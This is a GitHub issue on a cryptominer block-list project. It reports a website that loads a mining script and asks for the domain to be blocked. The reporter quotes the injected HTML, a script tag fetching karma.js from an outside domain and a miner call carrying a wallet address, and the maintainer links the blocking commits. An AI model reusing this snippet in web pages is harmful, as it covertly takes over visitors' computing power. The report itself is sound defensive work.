### ISSUE TITLE
crypto-webminer.com

### ISSUE THREAD

**Issue by persudo** [hoshsadiq/adblock-nocoin-list#440]
### Website with example

- `https://esudog.top/index.php?title=%E5%AE%9E%E5%90%8D/%E6%B1%AA%E6%A5%9A%E5%A5%87`

### Domain causing the CPU spike

- `https://trusteverything.de/karma/karma.js?karma=bs?nosaj=faster.mo`

Malicious code:
```
<html>
<body>
<!--StartFragment-->

<script src="https://trusteverything.de/karma/karma.js?karma=bs?nosaj=faster.mo" ></script>
--
  | <script type="text/javascript">
  | EverythingIsLife('8BLzfK4c9MV2PdNGJ88QkxPMHk9eox5u1UnfqC1ASYQciRJmjhkE7ndLhCaxm7UDEcNExbzmRSu9j6t2upXbQG3qRYnYYKF', 'x', 15);
  | </script>

<!--EndFragment-->
</body>
</html>
```

**Comment by smed79** [comment]
https://github.com/hoshsadiq/adblock-nocoin-list/commit/3a06db0dafdd162f258b7570b8885ca673e6ec45
https://github.com/hoshsadiq/adblock-nocoin-list/commit/112d0910850f3e8393f271c7818acaebbdaa8b79
